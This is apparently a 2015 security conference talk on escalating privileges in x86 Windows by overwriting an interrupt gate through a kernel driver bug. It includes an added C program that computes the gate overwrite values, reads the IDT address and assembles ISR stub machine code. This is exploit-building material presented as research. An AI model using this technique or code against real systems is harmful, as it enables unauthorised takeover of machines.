abusing interrupts for reliable windows kernel exploitation (en)

Post on 16-Apr-2017


Abusing Interrupts for Reliable Windows Kernel Exploitation

2015/11/14

AVTOKYO2015

inaz2

About me

• inaz2

• Security engineer & Python programmer
• Working at NTT Communications

• Weblog "momoiro technology"
• http://inaz2.hatenablog.com/

2

Windows kernel exploitation

• Attacks that exploit a vulnerability in kernel land
• Including vulnerabilities in device drivers

• A write-what-where condition/vulnerability is widely used
• Enables writing an arbitrary value to an arbitrary address

• Execute shellcode to escalate the privileges of the attacking process
• Then launch an administrator command prompt

3

Classic technique: halDispatchTable overwrite

• nt!NtQueryIntervalProfile internal API
• Calls [nt!halDispatchTable+4] via nt!KeQueryIntervalProfile

• Overwrite [nt!halDispatchTable+4] with the address of the shellcode

4

Replace token shellcode

• Copy the token object from System process (PID=4)

5

(Shellcode figure: replace 41414141h with the attacking process' PID)

It works but …

• Depends on the implementation of nt!NtQueryIntervalProfile
• The kernel implementation may change in the future (i.e. not reliable)

• Is there a more reliable target to overwrite?

6


x86 interrupt handling

• There are hardware interrupts (keyboard etc.) and software-generated ones: CPU exceptions (divide error etc.) and software interrupts triggered by the "int n" instruction

• Interrupt Descriptor Table (IDT)
• Each entry (interrupt gate) stores the address of the handler function (Interrupt Service Routine, ISR)

• ISRs are executed in Ring 0
• Can do everything

8

x86 privilege levels (protection rings)

• 4 privilege levels numbered from 0 to 3
• A greater number means fewer privileges

• Most OSes including Windows use only two rings
• Ring 0 corresponds to kernel mode and Ring 3 to user mode

9

Interrupt Descriptor Table (1/4)

• Intel Developer’s Manual Volume 3, Chapter 6

10

Interrupt Descriptor Table (2/4)

• Intel Developer’s Manual Volume 3, Chapter 6

11

(Figure annotation: a gate can be invoked from Ring 3 with "int n" only if its DPL=3; otherwise the CPU raises #GP)

Interrupt Descriptor Table (3/4)

• WinDbg (KD) view

12

Interrupt Descriptor Table (4/4)

• Overwrite the interrupt gate for interrupt #0

13

(WinDbg figure: gate after the overwrite, low dword 000884fc, high dword 4141ee00, i.e. selector 0x0008, offset[15:0]=0x84fc, P=1, DPL=3, type 0xE (32-bit interrupt gate), offset[31:16]=0x4141, so the handler address becomes 414184fc)

IDT overwrite technique

14

Get the IDT address

Overwrite the interrupt gate for interrupt #n

Trigger interrupt #n by “int n” instruction

Execute shellcode

Detailed procedure

16

Find the write-what-where vulnerability

• Write and install the vulnerable device driver• Enables to attack write-what-where vulnerability via IOCTL

17

Get the IDT address (1/2)

• The sidt instruction stores the IDTR (limit and base address of the IDT) to memory
• Can be used even in Ring 3!

18

Get the IDT address (2/2)

• The function that returns the IDT address (code figure: executes sidt and reads the base out of the IDTR structure)
• Alignment of the IDTR structure is disabled so that the 2-byte limit is immediately followed by the base address

19

Write the Interrupt Service Routine (ISR)

• Switch the value of the fs segment register
• 0x3B (TEB, user mode) → 0x30 (KPCR, kernel mode), and restore it before returning

• Call the shellcode placed right after the ISR

• Return with the iretd instruction instead of ret

20

Allocate memory & put the codes

• Allocate a nop sled from 0x41410000 to 0x41420000 (only the upper 16 bits of the handler offset are overwritten, so the ISR entry lands somewhere in this range)

• Put the ISR code + shellcode from 0x41420000

21

Overwrite the interrupt gate

• Write 0x4141ee00 to the latter half of the interrupt gate for interrupt #32 (P=1, DPL=3, 32-bit interrupt gate, offset[31:16]=0x4141; offset[15:0] in the first half stays as is, so the handler falls inside the nop sled)
• #32-255 are designated as user-defined interrupts (not reserved)

22

Trigger the software interrupt

• Execute "int 32"
• The shellcode is executed via the ISR

• Then launch cmd.exe

23

Demo

24

What about 64 bit Windows?

• The size of an interrupt gate increases to 16 bytes (the third dword holds bits 63:32 of the handler offset)

• Since a 0x100000000-byte nop sled is not practical, the entire interrupt gate has to be overwritten (i.e. write 2 times)

• However, my VirtualBox VM hangs when the interrupt is triggered (PatchGuard??)

25
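The following C program is an added example, not code from the slides, covering the x86 procedure above (get the IDT address, build the gate value, place the nop sled and ISR) and the 64-bit variant that needs two writes. It reads IDTR with sidt, decodes a gate as WinDbg displays it, computes the dword the write-what-where primitive has to store at IDT base + n*8 + 4, checks where the handler ends up, and assembles the ISR stub bytes. The sled and ISR addresses (0x41410000, 0x41420000), vector 32 and the gate dwords 000884fc / 4141ee00 come from the slides; the IDT base 0x80b95400, the 64-bit sample base 0x1000 and the 64-bit kernel code selector 0x10 are constructed assumptions. The vulnerable driver and the IOCTL that performs the write are deliberately not modelled.

```c
/* Added example, not code from the slides: the arithmetic behind the IDT
 * overwrite.  Reads IDTR with sidt, decodes an x86 interrupt gate, builds the
 * dword the write-what-where primitive stores, computes where the handler
 * ends up, and assembles the ISR stub.  The IDT base and 64-bit selector used
 * in main() are constructed samples; the vulnerable driver and its IOCTL that
 * perform the write are not modelled. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define GATE_P       (1u << 15)             /* present */
#define GATE_DPL(x)  ((uint32_t)(x) << 13)  /* ring allowed to use "int n" */
#define GATE_INT32   (0xEu << 8)            /* type 0xE: 32-bit interrupt gate */

struct gate32 { uint32_t offset; uint16_t selector; unsigned type, dpl, present; };

/* Decode an 8-byte gate from the two dwords WinDbg displays (low, high). */
struct gate32 gate32_decode(uint32_t lo, uint32_t hi)
{
    struct gate32 g;
    g.offset   = (hi & 0xFFFF0000u) | (lo & 0xFFFFu);
    g.selector = (uint16_t)(lo >> 16);
    g.type     = (hi >> 8) & 0xF;
    g.dpl      = (hi >> 13) & 0x3;
    g.present  = (hi >> 15) & 0x1;
    return g;
}

/* Dword written at IDT base + n*8 + 4: offset[31:16] of the sled, P=1, DPL=3,
 * type=0xE.  offset[15:0] stays whatever the original gate held, so the
 * handler lands somewhere inside the 64 KiB sled, never exactly at its start. */
uint32_t gate32_high_dword(uint32_t sled_base)
{
    return (sled_base & 0xFFFF0000u) | GATE_P | GATE_DPL(3) | GATE_INT32;
}

uintptr_t gate32_high_dword_addr(uintptr_t idt_base, unsigned n)
{
    return idt_base + (uintptr_t)n * 8 + 4;
}

/* 64-bit gates are 16 bytes: selector+offset[15:0], attr+offset[31:16],
 * offset[63:32], reserved.  With an 8-byte primitive two writes replace the
 * whole gate, so no sled is needed; the selector is kept from the original. */
void gate64_writes(uintptr_t idt_base, unsigned n, uint64_t handler,
                   uint16_t selector, uintptr_t addr[2], uint64_t val[2])
{
    uintptr_t gate = idt_base + (uintptr_t)n * 16;
    uint64_t lo = (handler & 0xFFFFu) | ((uint64_t)selector << 16);
    uint64_t hi = (uint64_t)gate32_high_dword((uint32_t)handler) << 32;
    addr[0] = gate;     val[0] = lo | hi;         /* IST bits are 0 */
    addr[1] = gate + 8; val[1] = handler >> 32;   /* reserved dword = 0 */
}

/* ISR stub at isr_addr, followed by the shellcode at shellcode_addr:
 *   push fs ; mov ax,0x30 ; mov fs,ax ; call shellcode ; pop fs ; iretd
 * push/pop fs restores the user-mode selector without hard-coding it. */
size_t isr_stub(uint8_t *out, uint32_t isr_addr, uint32_t shellcode_addr)
{
    static const uint8_t pre[] = { 0x0F, 0xA0, 0x66, 0xB8, 0x30, 0x00, 0x8E, 0xE0, 0xE8 };
    static const uint8_t post[] = { 0x0F, 0xA1, 0xCF };
    uint32_t rel = shellcode_addr - (isr_addr + (uint32_t)sizeof pre + 4);
    memcpy(out, pre, sizeof pre);
    for (int i = 0; i < 4; i++)                       /* rel32, little-endian */
        out[sizeof pre + i] = (uint8_t)(rel >> (8 * i));
    memcpy(out + sizeof pre + 4, post, sizeof post);
    return sizeof pre + 4 + sizeof post;              /* 16 bytes */
}

#if defined(__i386__) || defined(__x86_64__)
/* sidt is unprivileged (unless UMIP is on), so Ring 3 can read IDTR. */
uintptr_t read_idt_base(void)
{
    struct __attribute__((packed)) { uint16_t limit; uintptr_t base; } idtr;
    __asm__ volatile ("sidt %0" : "=m" (idtr));
    return idtr.base;
}
#endif

int main(void)
{
    uintptr_t idt_base = 0x80b95400;               /* constructed, not from the slides */
    uint32_t orig_lo = 0x000884fc, new_hi = gate32_high_dword(0x41410000);
    struct gate32 g = gate32_decode(orig_lo, new_hi);
    printf("write %08x at %08lx -> handler %08x dpl=%u\n",
           new_hi, (unsigned long)gate32_high_dword_addr(idt_base, 32), g.offset, g.dpl);
    uint8_t stub[16];
    size_t n = isr_stub(stub, 0x41420000, 0x41420010);
    printf("isr stub: %zu bytes, rel32 low byte=%02x\n", n, stub[9]);
#if defined(__i386__) || defined(__x86_64__)
    printf("live IDT base: %#lx\n", (unsigned long)read_idt_base());
#endif
    return 0;
}
```

Two caveats not discussed on the slides: on Linux hosts with UMIP enabled, sidt either faults or returns a kernel-spoofed base, so read_idt_base() cannot be relied on there; and on CPUs with SMEP (Windows 8 and later enable it) the CPU faults as soon as Ring 0 fetches the first nop of the user-mode sled, so the sled and ISR would have to live in kernel-accessible memory instead.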

Comparison with halDispatchTable overwrite

• Pros
• Reliable against all versions of x86-based Windows
• Easy to determine the address to be overwritten

• Cons
• Need to prepare the ISR code
• Need to allocate a nop sled
• Not confirmed on 64-bit

26

Recap

• The IDT overwrite technique is reliable against all versions of x86-based Windows
• Independent of kernel implementation changes

• We can get the IDT address even in Ring 3

• There's more than one way to do it

27

References

• Trying privilege escalation from a device driver vulnerability on Windows - momoiro technology (Japanese)
• http://inaz2.hatenablog.com/entry/2015/09/15/121926

• Project Zero: One font vulnerability to rule them all #4: Windows 8.1 64-bit sandbox escape exploitation
• http://googleprojectzero.blogspot.jp/2015/08/one-font-vulnerability-to-rule-them-all_21.html

• Interrupt Service Routines - OSDev Wiki
• http://wiki.osdev.org/Interrupt_Service_Routines

• SIMPLE IS BETTER: Kernel Information Leak with Unprivileged Instructions (SIDT, SGDT) on x86 - WHY ?
• http://hypervsir.blogspot.jp/2014/10/kernel-information-leak-with.html

28

Thank you! inaz2

29
